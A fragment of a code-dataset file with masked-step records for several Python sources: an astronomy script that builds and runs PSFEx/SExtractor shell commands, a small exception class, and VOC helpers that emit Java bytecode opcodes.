print(next_vertex.keys())\r\n print(\"\\n\")\r\n\r\n path = find_minimum_length_path(random_graph, 1, 4)\r\n print(path)\r\n\r\n\r\nmain()",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 21 11:40:26 2020
@author: jlee
"""
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
# ----- Making scripts for PSFEx ----- #
os.system("psfex -dd > config.psfex")
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh','w')
f.write('\n')
f.write('#############################'+'\n')
f.write('##### Scripts for PSFEx #####'+'\n')
f.write('#############################'+'\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_'+flt+'.cat\n')
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')
f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ")
f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ")
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n')
f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
# ----- Running scripts for PSFEx ----- #
if (glob.glob("PSFEx/") == []):
os.system("mkdir PSFEx")
else:
os.system("rm -rfv PSFEx/*")
os.system("sh psfex_all.sh")
os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/")
os.system("mv -v prepsfex_*-*.cat PSFEx/")
os.system("rm -rfv ./*.fits prepsfex_*.cat")
# Printing the running time
print("--- %s seconds ---" % (time.time() - start_time))
|
normal
|
{
"blob_id": "c23125018a77508dad6fd2cb86ec6d556fbd1019",
"index": 90,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\n<mask token>\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-3": "<mask token>\nstart_time = time.time()\n<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-4": "<mask token>\nimport time\nstart_time = time.time()\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\nimport init_cfg as ic\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 11:40:26 2020\n\n@author: jlee\n\"\"\"\n\n\nimport time\nstart_time = time.time()\n\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\n\nimport init_cfg as ic\n\n\n# ----- Making scripts for PSFEx ----- #\nos.system(\"psfex -dd > config.psfex\")\n\nif ic.use_backsub:\n\tprefix = 'b'\nelse:\n\tprefix = ''\n\nf = open('psfex_all.sh','w')\nf.write('\\n')\nf.write('#############################'+'\\n')\nf.write('##### Scripts for PSFEx #####'+'\\n')\nf.write('#############################'+'\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n\tf.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\\n')\n\tf.write('\\n')\n\tfor j in np.arange(len(ic.filters)):\n\t\tflt = ic.filters[j].split('-')[1]\n\t\tf.write('rm -rfv prepsfex_'+flt+'.cat\\n')\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')\n\t\tf.write(f\"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} \")\n\t\tf.write(f\"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} \")\n\t\tf.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')\n\t\tf.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\\n')\n\t\tf.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\\n')\n\t\tf.write('\\n')\n\tf.write('\\n\\n')\nf.close()\n\n\n# ----- Running scripts for PSFEx ----- #\nif (glob.glob(\"PSFEx/\") == []):\n\tos.system(\"mkdir PSFEx\")\nelse:\n\tos.system(\"rm -rfv PSFEx/*\")\n\nos.system(\"sh psfex_all.sh\")\n\nos.system(\"mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/\")\nos.system(\"mv -v prepsfex_*-*.cat PSFEx/\")\nos.system(\"rm -rfv ./*.fits prepsfex_*.cat\")\n\n\n# Printing the running time \nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/web_client_api/__init__.py
from soft_exception import SoftException
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
|
normal
|
{
"blob_id": "0f4864b745768994ea55a931e4d8b0681c058465",
"index": 2828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass WebCommandException(SoftException):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-4": "from soft_exception import SoftException\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-5": "# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/web_client_api/__init__.py\nfrom soft_exception import SoftException\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from ...java import opcodes as JavaOpcodes
from .primitives import ICONST_val
##########################################################################
# Common Java operations
##########################################################################
class New:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW(self.classname),
JavaOpcodes.DUP()
)
class Init:
def __init__(self, classname, *args):
self.classname = classname
self.args = args
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKESPECIAL(
self.classname,
'<init>',
args=self.args,
returns='V'
),
)
class Yield:
def __init__(self, yield_point):
self.yield_point = yield_point
def process(self, context):
context.add_opcodes(
ICONST_val(self.yield_point),
JavaOpcodes.INVOKEVIRTUAL(
'org/python/types/Generator',
'yield',
args=['Ljava/util/Map;', 'I'],
returns='V'
),
# "yield" by returning from the generator method.
JavaOpcodes.ARETURN()
)
##########################################################################
# Java types and their operations
##########################################################################
class Array:
def __init__(self, size, classname='org/python/Object', fill=None):
self.size = size
self.classname = classname
self.fill = fill
def process(self, context):
context.add_opcodes(
ICONST_val(self.size),
JavaOpcodes.ANEWARRAY(self.classname),
)
if self.fill:
for i in range(self.size):
context.add_opcodes(
JavaOpcodes.DUP(),
ICONST_val(i),
self.fill,
JavaOpcodes.AASTORE(),
)
class List:
def __init__(self, size=None):
self.size = size
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/ArrayList'),
JavaOpcodes.DUP(),
)
if self.size:
context.add_opcodes(
ICONST_val(self.size),
Init('java/util/ArrayList', 'I')
)
else:
context.add_opcodes(
Init('java/util/ArrayList')
)
class add:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/List',
'add',
args=['Ljava/lang/Object;'],
returns='Z'
),
JavaOpcodes.POP(),
)
class Map:
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/HashMap'),
JavaOpcodes.DUP(),
Init('java/util/HashMap')
)
class get:
def __init__(self, key):
self.key = key
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.key),
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'get',
args=['Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
)
)
class put:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'put',
args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
),
JavaOpcodes.POP()
)
class putAll:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'putAll',
args=['Ljava/util/Map;'],
returns='V'
),
)
class Class:
class forName:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.classname),
JavaOpcodes.INVOKESTATIC(
'java/lang/Class',
'forName',
args=['Ljava/lang/String;'],
returns='Ljava/lang/Class;'
),
)
class THROW:
# Raise an exception of given type with given arguments
# Example:
# THROW(
# 'org/python/exceptions/AttributeError',
# ['Ljava/lang/String;', JavaOpcodes.LDC_W("Invalid attribute")],
# )
def __init__(self, exception_class, *exception_args):
self.exception_class = exception_class
self.exc_arg_types = [e[0] for e in exception_args]
self.exc_arg_values = [e[1] for e in exception_args]
def process(self, context):
context.add_opcodes(
New(self.exception_class),
*self.exc_arg_values
)
context.add_opcodes(
Init(self.exception_class, *self.exc_arg_types),
JavaOpcodes.ATHROW(),
)
|
normal
|
{
"blob_id": "67e0536dc9f38ab82fe30e715599fed93c5425a5",
"index": 5142,
"step-1": "<mask token>\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-2": "<mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-3": "<mask token>\n\n\nclass Init:\n <mask token>\n <mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-4": "<mask token>\n\n\nclass Init:\n\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKESPECIAL(self.classname,\n '<init>', args=self.args, returns='V'))\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, 